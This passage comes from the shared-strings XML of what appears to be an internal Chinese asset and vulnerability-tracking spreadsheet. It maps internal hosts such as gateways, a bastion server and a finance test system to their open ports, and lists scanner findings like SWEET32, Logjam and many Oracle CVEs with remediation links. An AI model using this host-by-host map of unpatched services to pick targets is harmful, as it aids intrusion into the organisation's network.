    <t>172.16.5.70</t>
  </si>
  <si>
    <t>2712826858</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
fmsascon(16001)
msrpc(49664,49667,49665,49675,49669,49673,49752,135)
http(5985,47001)
x11(6000)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>管理服务器</t>
  </si>
  <si>
    <t>172.16.5.200</t>
  </si>
  <si>
    <t>3539599698</t>
  </si>
  <si>
    <t>msrpc(49728,49677,49664,49835,49665,49666,135,49668)
ms-wbt-server(3389)
http(5985,47001)
netbios-ssn(139)
microsoft-ds(445)
tcpwrapped(21)</t>
  </si>
  <si>
    <t>泛微oa系统-应用服务器</t>
  </si>
  <si>
    <t>172.16.5.31</t>
  </si>
  <si>
    <t>3657652292</t>
  </si>
  <si>
    <t>msrpc(49153,49267,49221,135,49155,49274,49152,49154)
http(8080,9081,1117,88,9090,47001,7070,5985)
ms-wbt-server(3389)
tcpwrapped(10050,49220,49224)
mysqlx(48060)
mysql(4806)
jabber(5222)
netbios-ssn(139)
ssl(8444,5223,9443)
microsoft-ds(445)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Resin weaver1000</t>
  </si>
  <si>
    <t>jQuery(Polyfill)
Bootstrap
jQuery(layer.js)
Polyfill(jQuery)</t>
  </si>
  <si>
    <t>深信服安全探针</t>
  </si>
  <si>
    <t>172.16.5.100</t>
  </si>
  <si>
    <t>上海漏扫工具TSS</t>
  </si>
  <si>
    <t>172.16.6.200</t>
  </si>
  <si>
    <t>堡垒机应用发布服务器</t>
  </si>
  <si>
    <t>172.16.5.21</t>
  </si>
  <si>
    <t>http(47001,80,5985)
kpasswd5(464)
ms-wbt-server(3389)
msrpc(49159,49158,49153,49176,49198,49162,49182,135,49155,49180,49183,49152,49154,49164,5504)
kerberos-sec(88)
domain(53)
ncacn_http(593,49157)
tcpwrapped(10050,3269,636)
netbios-ssn(139)
microsoft-ds(445)
ssl(443)
mc-nmf(9389)
ldap(3268,389)</t>
  </si>
  <si>
    <t>.NET</t>
  </si>
  <si>
    <t>财务系统测试环境</t>
  </si>
  <si>
    <t>172.16.5.13</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
netbios-ssn(139)
http(9090,47001,5985)
oracle-mts(49152)
microsoft-ds(445)
tcpwrapped(10050)
oracle-tns(1521,62850)
msrpc(49664,49667,135,49672,49725,49675,49665,49668)</t>
  </si>
  <si>
    <t>Oracle
Oracle MTS Recovery Service</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
Apache-Tomcat</t>
  </si>
  <si>
    <t>上海5段网关</t>
  </si>
  <si>
    <t>172.16.5.254</t>
  </si>
  <si>
    <t>telnet(23)
ssh(22)
tcpwrapped(64443)</t>
  </si>
  <si>
    <t>数据中台中间库-主库</t>
  </si>
  <si>
    <t>172.16.6.30</t>
  </si>
  <si>
    <t>上海6段网关</t>
  </si>
  <si>
    <t>172.16.6.254</t>
  </si>
  <si>
    <t>数据中台中间库-同步程序</t>
  </si>
  <si>
    <t>172.16.5.66</t>
  </si>
  <si>
    <t>服务内容</t>
  </si>
  <si>
    <t>资产类型</t>
  </si>
  <si>
    <t>类型</t>
  </si>
  <si>
    <t>子类型</t>
  </si>
  <si>
    <t>影子资产数</t>
  </si>
  <si>
    <t>基础资产</t>
  </si>
  <si>
    <t>域名资产</t>
  </si>
  <si>
    <t>根域名资产</t>
  </si>
  <si>
    <t>子域名资产</t>
  </si>
  <si>
    <t>IP资产</t>
  </si>
  <si>
    <t>端口资产</t>
  </si>
  <si>
    <t>WEB资产</t>
  </si>
  <si>
    <t>非WEB资产</t>
  </si>
  <si>
    <t>网络&amp;安全设备</t>
  </si>
  <si>
    <t>云类资产</t>
  </si>
  <si>
    <t>SSL证书</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>移动端资产</t>
  </si>
  <si>
    <t>APP</t>
  </si>
  <si>
    <t>公众号</t>
  </si>
  <si>
    <t>小程序</t>
  </si>
  <si>
    <t>漏洞名称</t>
  </si>
  <si>
    <t>扫描方式</t>
  </si>
  <si>
    <t>漏洞类型</t>
  </si>
  <si>
    <t>漏洞等级</t>
  </si>
  <si>
    <t>是否可利用</t>
  </si>
  <si>
    <t>防护规则</t>
  </si>
  <si>
    <t>业务系统</t>
  </si>
  <si>
    <t>负责人</t>
  </si>
  <si>
    <t>受影响主机/位置</t>
  </si>
  <si>
    <t>IP</t>
  </si>
  <si>
    <t>端口</t>
  </si>
  <si>
    <t>版本号</t>
  </si>
  <si>
    <t>内/外网</t>
  </si>
  <si>
    <t>修复优先级</t>
  </si>
  <si>
    <t>跟进状态</t>
  </si>
  <si>
    <t>备注信息</t>
  </si>
  <si>
    <t>来源</t>
  </si>
  <si>
    <t>发现时间
（填充此单元格为粉红色代表是最近扫描新增漏洞）</t>
  </si>
  <si>
    <t>更新时间</t>
  </si>
  <si>
    <t>漏洞危害</t>
  </si>
  <si>
    <t>解决方案</t>
  </si>
  <si>
    <t>参考资料</t>
  </si>
  <si>
    <t>SSH Diffie-Hellman 模数 &lt;= 1024 位 (Logjam)(CVE-2015-4000)</t>
  </si>
  <si>
    <t>版本比较</t>
  </si>
  <si>
    <t>系统漏洞</t>
  </si>
  <si>
    <t>低危</t>
  </si>
  <si>
    <t>否</t>
  </si>
  <si>
    <t>无效</t>
  </si>
  <si>
    <t>未知责任人</t>
  </si>
  <si>
    <t>22</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>建议修复</t>
  </si>
  <si>
    <t>处置中</t>
  </si>
  <si>
    <t>TSS</t>
  </si>
  <si>
    <t>这允许攻击者恢复明文或可能违反连接的完整性。</t>
  </si>
  <si>
    <t>重新配置服务以使用唯一的、2048 位或更高位数的 Diffie-Hellman moduli。</t>
  </si>
  <si>
    <t>https://weakdh.org/
https://stribika.github.io/2015/01/04/secure-secure-shell.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-428
http://www.securityfocus.com/bid/74733
http://www.securityfocus.com/bid/91787</t>
  </si>
  <si>
    <t>支持SSL 64位块大小的密码套件（SWEET32）</t>
  </si>
  <si>
    <t>原理扫描</t>
  </si>
  <si>
    <t>高危</t>
  </si>
  <si>
    <t>3389</t>
  </si>
  <si>
    <t>尽快修复</t>
  </si>
  <si>
    <t>具有足够资源的中间人攻击者可利用此漏洞,通过“birthday”攻击检测会在固定密码与已知纯文本之间泄露 XOR 的冲突,进而泄露密码文本（例如安全 HTTPS Cookie）,并可能导致劫持经认证的会话。</t>
  </si>
  <si>
    <t>参见《支持SSL 64位块大小的密码套件（SWEET32）-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/weixin_46167705/article/details/123374139</t>
  </si>
  <si>
    <t>终端服务未使用网络级别身份验证（NLA）</t>
  </si>
  <si>
    <t>中危</t>
  </si>
  <si>
    <t>未使用该认证的远程主机受攻击的风险等级高。</t>
  </si>
  <si>
    <t>参见《终端服务未使用网络级别身份验证（NLA）-修复方案》</t>
  </si>
  <si>
    <t>https://blog.csdn.net/spring_is_coming/article/details/124982320</t>
  </si>
  <si>
    <t>SSL RC4 加密套件支持检测 (Bar Mitzvah)</t>
  </si>
  <si>
    <t>攻击者可利用大量的密文推测明文，导致远程主机信息泄露。</t>
  </si>
  <si>
    <t>参见《SSL RC4 加密套件支持检测 (Bar Mitzvah)-修复方案》</t>
  </si>
  <si>
    <t>https://www.imperva.com/docs/HII_Attacking_SSL_when_using_RC4.pdf
https://blog.csdn.net/m0_54434140/article/details/126536929</t>
  </si>
  <si>
    <t>Apache Tomcat 6.x &lt; 6.0.35 多个漏洞</t>
  </si>
  <si>
    <t>8030</t>
  </si>
  <si>
    <t>成功利用可能会导致敏感信息泄露或者拒绝服务的情况</t>
  </si>
  <si>
    <t>升级到 Apache Tomcat 6.0.35 或更高版本。</t>
  </si>
  <si>
    <t>http://svn.apache.org/viewvc?view=revision&amp;revision=1162959
https://bz.apache.org/bugzilla/show_bug.cgi?id=51698#c2
http://www.nruns.com/_downloads/advisory28122011.pdf
http://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.35
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-056,CNNVD-201201-195,CNNVD-201201-207,CNNVD-201108-510,CNNVD-201112-503
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-056,CNNVD-201201-195,CNNVD-201201-207,CNNVD-201108-510,CNNVD-201112-503
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-056,CNNVD-201201-195,CNNVD-201201-207,CNNVD-201108-510,CNNVD-201112-503
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-056,CNNVD-201201-195,CNNVD-201201-207,CNNVD-201108-510,CNNVD-201112-503
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-056,CNNVD-201201-195,CNNVD-201201-207,CNNVD-201108-510,CNNVD-201112-503</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件远程安全漏洞（CVE-2013-5858）</t>
  </si>
  <si>
    <t>1521</t>
  </si>
  <si>
    <t>Oracle: 11.2.0.4</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.1.0.7版本,11.2.0.4版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujan2014-1972949）以及相应补丁:cpujan2014-1972949：Oracle Critical Patch Update Advisory - January 2014链接：http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html</t>
  </si>
  <si>
    <t>Oracle Database Server 'TNS Listener'远程数据投毒漏洞（CVE-2012-1675）</t>
  </si>
  <si>
    <t>ips-11000221（有效）</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.3版本(含)到10.2.0.5版本(含),11.1.0.7版本,11.2.0.2版本,11.2.0.3版本,11.2.0.4版本</t>
  </si>
  <si>
    <t>厂商补丁： Oracle ------ Oracle已经为此发布了一个安全公告（alert-cve-2012-1675-1608180）以及相应补丁: alert-cve-2012-1675-1608180：Oracle Security Alert for CVE-2012-1675 链接：http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html
https://blogs.oracle.com/security/entry/security_alert_for_cve_2012
http://xforce.iss.net/xforce/xfdb/75303</t>
  </si>
  <si>
    <t>Oracle Database Server Listener远程拒绝服务漏洞(CVE-2012-0072)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.2版本(含)到11.2.0.5版本(含),10.2.0.5版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>Oracle已经为此发布了一个安全公告（cpujan2012-366304）以及相应补丁: cpujan2012-366304：Oracle Critical Patch Update Advisory - January 2012  链接：https://www.oracle.com/security-alerts/cpujan2012.html#AppendixDB</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2012.html
https://www.cnvd.org.cn/flaw/show/CNVD-2012-0230</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>Oracle已经为此发布了一个安全公告（cpujan2012-366304）以及相应补丁: cpujan2012-366304：Oracle Critical Patch Update Advisory - January 2012 链接：http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2012.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0082
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html#AppendixDB
https://www.cnvd.org.cn/flaw/show/CNVD-2012-0231</t>
  </si>
  <si>
    <t>Oracle Database Server Spatial组件本地安全漏洞（CVE-2014-0378）</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-4236)</t>
  </si>
  <si>
    <t>影响oracle:12.1.0.1版本,11.2.0.4版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujul2014-1972956）以及相应补丁:cpujul2014-1972956：Oracle Critical Patch Update Advisory - July 2014链接：http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4293)</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.7版本,11.2.0.3版本,11.2.0.4版本,12.1.0.1版本,12.1.0.2版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4293
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07109</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2014-4294)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4294
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07113</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4297)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4297
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07269</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-4298)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4298
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07122</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-4300)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4300
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07124</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件代码执行漏洞(CVE-2014-6453)</t>
  </si>
  <si>
    <t>厂商补丁：目前厂商已经发布升级补丁解决此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件代码执行漏洞(CVE-2014-6467)</t>
  </si>
  <si>
    <t>厂商补丁：目前Oracle厂商已经发布升级补丁解决此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6467
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07116
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件漏洞(CVE-2014-6477)</t>
  </si>
  <si>
    <t>厂商补丁Oracle------目前厂商已经发布了升级补丁以修复此安全问题，如有具体升级详情问题可咨询oracle厂商，补丁获取链接： http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6477
https://www.cnvd.org.cn/flaw/show/CNVD-2014-08588</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2014-6538)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6538
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07260</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-6542)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6542
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07117</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-6547)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6547
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07128</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-0371)</t>
  </si>
  <si>
    <t>Oracle------Oracle已经为此发布了一个安全公告（cpujan2015-1972971）以及相应补丁:cpujan2015-1972971：Oracle Critical Patch Update Advisory - January 2015链接：http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>Oracle Database Server OJVM组件安全漏洞(CVE-2015-0373)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,11.2.0.3版本,12.1.0.2版本,12.1.0.1版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0373
https://www.cnvd.org.cn/flaw/show/CNVD-2015-00530</t>
  </si>
  <si>
    <t>Oracle Database Server XDB - XML Database组件安全漏洞(CVE-2015-0455)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本,12.1.0.2版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpuapr2015-2365600）以及相应补丁: cpuapr2015-2365600：Oracle Critical Patch Update Advisory - April 2015  链接：http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0455
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02520</t>
  </si>
  <si>
    <t>Oracle Database 远程安全漏洞(CVE-2015-2599)</t>
  </si>
  <si>
    <t>厂商补丁:Oracle------Oracle已经为此发布了一个安全公告（cpujul2015-2367936）以及相应补丁:cpujul2015-2367936：Oracle Critical Patch Update Advisory - July 2015链接：http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件任意代码执行漏洞(CVE-2015-2629)</t>
  </si>
  <si>
    <t>Oracle已经为此发布了一个安全公告（cpujul2015-2367936）以及相应补丁: cpujul2015-2367936：Oracle Critical Patch Update Advisory - July 2015 链接：http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager for Oracle Database组件安全漏洞(CVE-2015-2646)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2015-4794)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>Oracle------Oracle已经为此发布了一个安全公告（cpuoct2015-2367953）以及相应补丁:cpuoct2015-2367953：Oracle Critical Patch Update Advisory - October 2015链接：http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html补丁下载：https://support.oracle.com/rs?type=doc&amp;id=2049800.1</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2015verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4794
https://www.cnvd.org.cn/flaw/show/CNVD-2015-06948</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS组件远程信息泄露安全漏洞（CVE-2014-0377）</t>
  </si>
  <si>
    <t>Oracle Database 远程安全漏洞(CVE-2014-2406)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本,11.1.0.7版本,11.1.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2014-1972952）以及相应补丁:cpuapr2014-1972952：Oracle Critical Patch Update Advisory - April 2014链接：http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html https://support.oracle.com/rs?type=doc&amp;id=1618213.1</t>
  </si>
  <si>
    <t>Oracle Database Server DBMS_LDAP 远程安全漏洞(CVE-2014-3566)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.4版本,12.1.0.2版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujul2017-3236622）以及相应补丁:cpujul2017-3236622：Oracle Critical Patch Update Advisory - July 2017链接：http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-4237)</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-4245)</t>
  </si>
  <si>
    <t>Oracle Database Server JDBC组件拒绝服务漏洞(CVE-2014-4289)</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.7版本,11.2.0.3版本,11.2.0.4版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4289
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07129</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4310)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4310
https://www.cnvd.org.cn/flaw/show/CNVD-2014-06960</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager for Oracle Database组件安全漏洞(CVE-2014-6488)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html</t>
  </si>
  <si>
    <t xml:space="preserve">
</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-6514)</t>
  </si>
  <si>
    <t>Oracle已经为此发布了一个安全公告（cpujan2015-1972971）以及相应补丁: cpujan2015-1972971：Oracle Critical Patch Update Advisory - January 2015 链接：http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-6541)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2014-6563)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6563
https://www.cnvd.org.cn/flaw/show/CNVD-2014-06959</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-6567)</t>
  </si>
  <si>
    <t>Oracle已经为此发布了一个安全公告（cpujan2015-1972971）以及相应补丁: cpujan2015-1972971：Oracle Critical Patch Update Advisory - January 2015  链接：http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6567
https://www.cnvd.org.cn/flaw/show/CNVD-2015-00487</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-6577)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6577
https://www.cnvd.org.cn/flaw/show/CNVD-2015-00490</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2014-6578)</t>
  </si>
  <si>
    <t>Oracle Database Server远程安全漏洞(CVE-2015-0370)</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2015-0457)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0457
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02577</t>
  </si>
  <si>
    <t>Oracle Database 远程安全漏洞(CVE-2015-4740)</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform组件安全漏洞(CVE-2016-0449)</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.1版本,11.2.0.4版本,12.1.0.4版本,12.1.0.5版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2016-0499)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control 远程安全漏洞(CVE-2016-0691)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html</t>
  </si>
  <si>
    <t>Oracle Database 远程安全漏洞(CVE-2014-2408)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.3版本,11.2.0.4版本,11.1.0.7版本,12.1.0.1版本</t>
  </si>
  <si>
    <t>Oracle Database Server 安全漏洞(CVE-2014-2478)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuoct2014verbose.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2478
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07130</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4290)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4290
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07115</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4291)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4291
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07267</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4292)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4292
https://www.cnvd.org.cn/flaw/show/CNVD-2014-06795</t>
  </si>
  <si>
    <t>Oracle Database Server Java VM组件安全漏洞(CVE-2014-4295)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4295
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07264</t>
  </si>
  <si>
    <t>Oracle Database Server Jpublisher组件安全漏洞(CVE-2014-4296)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4296
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07114</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-4299)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4299
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07123</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-6452)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6452
https://www.cnvd.org.cn/flaw/show/CNVD-2014-07125</t>
  </si>
  <si>
    <t>Oracle Database Server SQLJ组件安全漏洞(CVE-2014-6454)</t>
  </si>
  <si>
